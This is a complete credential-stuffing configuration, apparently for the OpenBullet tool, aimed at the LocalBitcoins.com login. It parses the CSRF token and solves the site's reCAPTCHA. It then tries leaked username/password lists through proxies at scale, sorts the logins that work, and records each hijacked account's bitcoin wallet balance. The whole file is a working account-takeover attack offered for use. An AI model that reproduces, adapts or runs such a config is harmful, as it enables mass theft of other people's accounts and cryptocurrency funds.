[SETTINGS]
{
  "Name": "LocalBitcoins.com",
  "SuggestedBots": 150,
  "LastModified": "2018-06-07T23:54:57.862267+00:00",
  "AdditionalInfo": "",
  "Author": "Dreamzje [ KEEPIT.ONLINE ]",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_REQUEST REQUEST GET "https://localbitcoins.com/accounts/login/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#Token_Parse PARSE "<SOURCE>" LR "csrfmiddlewaretoken' value='" "'" Recursive=FALSE -> VAR "TOKEN" "" "" 
RECAPTCHA "https://localbitcoins.com/accounts/login/" "6Le95uoSAAAAAH3LKzssY-LHQOMu6eBag0yqlA6O" -> VAR "RECAPTCHA" 
#LOGIN_REQUEST REQUEST POST "https://localbitcoins.com/accounts/login/" AutoRedirect=TRUE 
  CONTENT "csrfmiddlewaretoken=<TOKEN>&username=<USER>&password=<PASS>&g-recaptcha-response=<RECAPTCHA>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Referer: https://localbitcoins.com/accounts/login/" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Origin: https://localbitcoins.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Please enter a correct username and password" 
  KEYCHAIN Success OR 
    KEY ">&nbsp;Log out<" 
    KEY "<a href=\"/accounts/profile/" 
    KEY "<a class=\"navbar-link\" href=\"/accounts/wallet/\">" 
    KEY "<COOKIES(*)>" Contains "You have bitcoins in your wallet" 
  KEYCHAIN Retry OR 
    KEY "Captcha failed!" 
REQUEST GET "https://localbitcoins.com/accounts/wallet/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://localbitcoins.com/accounts/login/" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "<strong class=\"alert-heading\">Success.</strong>" 
    KEY "You last logged in " 
    KEY "You have bitcoins in your wallet" 
PARSE "<SOURCE>" LR "Wallet: " "BTC</a></li>" Recursive=FALSE -> CAP "Wallet Balance" "" "" 
